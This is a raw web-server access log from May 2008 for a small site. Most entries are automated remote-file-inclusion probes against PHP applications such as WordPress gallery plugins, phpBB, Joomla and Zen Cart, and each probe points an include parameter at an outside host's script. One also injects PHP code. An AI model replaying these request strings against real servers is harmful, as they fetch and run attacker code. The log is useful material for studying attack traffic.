77.232.68.17 - - [11/May/2008:17:52:40 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:17:52:56 -0700] "GET /logs/access_080128.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:17:52:56 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:17:52:56 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
160.99.12.231 - - [11/May/2008:17:54:27 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
202.160.178.101 - - [11/May/2008:17:54:31 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.toulouseangloexchange.com"
202.160.178.70 - - [11/May/2008:17:54:33 -0700] "GET / HTTP/1.0" 200 903 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:17:54:33 -0700] "GET /logs/access_080128.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:17:54:34 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
212.241.193.243 - - [11/May/2008:17:54:35 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fadhilla.net/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:17:54:35 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
212.241.193.243 - - [11/May/2008:17:54:35 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fadhilla.net/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
212.241.193.243 - - [11/May/2008:17:54:35 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://fadhilla.net/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.17.138.13 - - [11/May/2008:17:54:53 -0700] "GET //config/dbutil.bck.php?confdir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.toulouseangloexchange.com"
85.17.138.13 - - [11/May/2008:17:54:54 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.toulouseangloexchange.com"
74.53.240.146 - - [11/May/2008:17:56:33 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [11/May/2008:17:56:33 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [11/May/2008:17:56:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
67.15.8.80 - - [11/May/2008:17:56:43 -0700] "GET //includes/db_connect.php?baseDir=http://paginas.terra.com.br/lazer/xxxxfatalxxxx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:17:56:47 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.15.8.80 - - [11/May/2008:17:56:47 -0700] "GET /logs//includes/db_connect.php?baseDir=http://paginas.terra.com.br/lazer/xxxxfatalxxxx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:17:56:47 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:17:56:47 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:57:17 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:57:17 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:57:17 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:57:17 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:57:17 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:57:17 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:57:24 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:57:24 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:57:24 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
160.99.12.231 - - [11/May/2008:17:58:00 -0700] "GET /logs//config.inc.php?path_escape=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
160.99.12.231 - - [11/May/2008:17:58:01 -0700] "GET //config.inc.php?path_escape=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:17:58:10 -0700] "GET //config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
160.99.12.231 - - [11/May/2008:17:58:32 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
160.99.12.231 - - [11/May/2008:17:58:32 -0700] "GET //config/dbutil.bck.php?confdir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
69.90.72.88 - - [11/May/2008:17:58:44 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.90.72.88 - - [11/May/2008:17:58:45 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.195.11.193 - - [11/May/2008:17:59:01 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
200.195.11.193 - - [11/May/2008:17:59:02 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
200.195.11.193 - - [11/May/2008:17:59:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
200.195.11.193 - - [11/May/2008:17:59:07 -0700] "GET /logs/access_080128.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
200.195.11.193 - - [11/May/2008:17:59:08 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:17:59:08 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:17:59:08 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:17:59:08 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:17:59:08 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
200.195.11.193 - - [11/May/2008:17:59:08 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:17:59:09 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:17:59:09 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:17:59:10 -0700] "GET /logs/access_080211.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:17:59:10 -0700] "GET /logs/access_080211.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [11/May/2008:17:59:12 -0700] "GET /logs/access_080127.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:17:59:28 -0700] "GET /logs/access_080127.log//bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:17:59:33 -0700] "GET /logs/access_080127.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
84.19.176.158 - - [11/May/2008:18:00:38 -0700] "GET //config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
86.109.96.33 - - [11/May/2008:18:01:19 -0700] "GET /logs/access_080225.log//Neos_Chronos/header.php?base_folder=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
86.109.96.33 - - [11/May/2008:18:01:19 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
86.109.96.33 - - [11/May/2008:18:01:19 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:18:01:44 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:03:36 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:03:40 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:03:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
200.195.11.193 - - [11/May/2008:18:04:08 -0700] "GET /logs/access_080127.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:04:42 -0700] "GET /logs/access_080128.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:04:44 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:04:47 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:07:13 -0700] "GET /logs/access_080225.log//bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:07:15 -0700] "GET //bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:07:16 -0700] "GET /logs//bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
74.53.240.146 - - [11/May/2008:18:07:50 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [11/May/2008:18:07:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [11/May/2008:18:07:50 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:18:08:37 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:18:08:37 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:18:08:38 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
145.100.60.18 - - [11/May/2008:18:10:12 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
145.100.60.18 - - [11/May/2008:18:10:12 -0700] "GET //config/dbutil.bck.php?confdir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
145.100.60.18 - - [11/May/2008:18:10:12 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:18:10:16 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:18:10:16 -0700] "GET //config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:18:10:16 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
74.53.240.146 - - [11/May/2008:18:11:09 -0700] "GET /logs/access_080128.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:18:12:11 -0700] "GET /logs/access_080128.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:18:12:13 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:18:12:13 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.90.72.88 - - [11/May/2008:18:12:27 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:12:29 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:12:30 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:12:31 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:13:31 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:18:14:01 -0700] "GET //citywriter/head.php?path=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:14:53 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:14:53 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:14:54 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
84.19.176.158 - - [11/May/2008:18:15:15 -0700] "GET //citywriter/head.php?path=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:17:08 -0700] "GET /logs/access_080107.log//bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:17:09 -0700] "GET //bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:17:09 -0700] "GET /logs//bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
84.19.176.158 - - [11/May/2008:18:17:39 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
84.19.176.158 - - [11/May/2008:18:17:40 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:17:41 -0700] "GET /logs/access_080127.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
212.241.193.243 - - [11/May/2008:18:21:11 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fadhilla.net/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
212.241.193.243 - - [11/May/2008:18:21:12 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fadhilla.net/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
212.241.193.243 - - [11/May/2008:18:21:12 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fadhilla.net/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
145.100.60.18 - - [11/May/2008:18:21:48 -0700] "GET /logs/access_080225.log//citywriter/head.php?path=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
145.100.60.18 - - [11/May/2008:18:21:48 -0700] "GET //citywriter/head.php?path=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
